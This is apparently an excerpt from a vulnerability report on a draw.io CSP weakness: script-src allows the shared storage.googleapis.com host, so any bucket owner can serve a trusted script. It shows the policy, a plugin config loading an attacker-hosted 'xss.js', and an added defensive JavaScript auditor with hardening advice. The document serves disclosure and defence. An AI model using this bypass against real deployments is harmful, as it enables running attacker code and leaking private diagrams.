Drawio web instances allow https://storage.googleapis.com in the CSP script-src directive. Combined with the XSS found in this report, this makes it possible to bypass the CSP and leak private diagram content.
On the web application side, JavaScript execution is restricted by the following CSP (excerpt):
...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...
Because the policy allows scripts to be loaded from https://storage.googleapis.com, the shared public hostname for every Google Cloud Storage bucket, anyone can create a bucket, upload a JavaScript file to it and have the browser execute that file under this CSP. The plugin configuration below loads such a file:
{
"plugins": [
"https://storage.googleapis.com/bypass_csp/xss.js"
]
}
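The following is an added example, not code from the original report or from the draw.io project: a small JavaScript CSP auditor that parses a script-src directive, flags host sources under which any account holder can publish files, and checks whether a given plugin URL would be permitted. The list of public-upload hosts, the bucket name in the hardened policy and the page origin https://drawio.example are assumptions made for the example; the report's own CSP excerpt and plugin URL are used as input.

```javascript
// Added example, not code from the original report or from draw.io.
// Scheme and port matching are simplified; hash and nonce sources never
// match an external URL, so they are ignored when checking a URL.

// Hosts where any account holder can publish a file under the host name.
// Allowing the bare host in script-src lets an attacker serve their own
// script. This list is an assumption of the example, seeded with the
// Google Cloud Storage host the report abuses.
const PUBLIC_UPLOAD_HOSTS = ["storage.googleapis.com", "s3.amazonaws.com"];

// The script-src directive quoted in the report (one hash kept for brevity).
const REPORT_CSP =
  "script-src https://www.dropbox.com https://api.trello.com 'self' " +
  "https://viewer.diagrams.net https://storage.googleapis.com " +
  "https://apis.google.com https://*.pusher.com " +
  "'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes='";

// A hardened variant (assumed bucket name): only one bucket path is allowed.
const HARDENED_CSP =
  "script-src 'self' https://storage.googleapis.com/drawio-plugins/";

// Plugin URL from the report's config.
const PLUGIN_URL = "https://storage.googleapis.com/bypass_csp/xss.js";

// Split a policy into { directiveName: [sourceExpressions] }.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Break a host source like https://*.foo.com/path into its parts.
// Keyword sources ('self', 'unsafe-inline', 'sha256-...', 'nonce-...') give null.
function parseSource(source) {
  if (source.startsWith("'")) return null;
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/]+)(\/.*)?$/i);
  if (!m) return null;
  return { scheme: (m[1] || "").toLowerCase(), host: m[2].toLowerCase(), path: m[3] || "" };
}

// CSP host matching: *.foo.com covers subdomains of foo.com, not foo.com itself.
function hostCovers(sourceHost, targetHost) {
  if (sourceHost.startsWith("*.")) return targetHost.endsWith(sourceHost.slice(1));
  return sourceHost === targetHost;
}

// CSP path matching: a path ending in "/" is a prefix, anything else is exact.
// Caveat: browsers skip the path check for URLs reached through a redirect,
// so an open redirect on the allowed host would still defeat a path restriction.
function pathMatches(sourcePath, targetPath) {
  if (sourcePath.endsWith("/")) return targetPath.startsWith(sourcePath);
  return targetPath === sourcePath;
}

function scriptSources(policy) {
  const csp = parseCsp(policy);
  return csp["script-src"] || csp["default-src"] || [];
}

// Return the script-src entries that allow a whole public-upload host with
// no path restriction, i.e. entries an attacker satisfies by uploading a file.
function findScriptSrcBypasses(policy) {
  const findings = [];
  for (const src of scriptSources(policy)) {
    const s = parseSource(src);
    if (!s) continue;
    const unrestricted = s.path === "" || s.path === "/";
    if (unrestricted && PUBLIC_UPLOAD_HOSTS.some((h) => hostCovers(s.host, h))) {
      findings.push(src);
    }
  }
  return findings;
}

// Would a page at pageOrigin be allowed to load a script from url?
function scriptAllowed(policy, url, pageOrigin) {
  const u = new URL(url);
  for (const src of scriptSources(policy)) {
    if (src === "'self'") {
      if (u.origin === pageOrigin) return true;
      continue;
    }
    const s = parseSource(src);
    if (!s) continue;
    if (s.scheme && s.scheme !== u.protocol.slice(0, -1)) continue;
    if (!hostCovers(s.host, u.hostname)) continue;
    if (s.path && !pathMatches(s.path, u.pathname)) continue;
    return true;
  }
  return false;
}

console.log(findScriptSrcBypasses(REPORT_CSP)); // ["https://storage.googleapis.com"]
console.log(scriptAllowed(REPORT_CSP, PLUGIN_URL, "https://drawio.example")); // true
console.log(scriptAllowed(HARDENED_CSP, PLUGIN_URL, "https://drawio.example")); // false
```

Run against the report's policy, the auditor flags https://storage.googleapis.com and confirms that the plugin URL from the config above is permitted; against the path-restricted variant the same URL is rejected while scripts under the allowed bucket prefix still load. Because path restrictions are dropped on redirects, serving plugins from the application's own origin (covered by 'self') or pinning them by hash is the more robust fix.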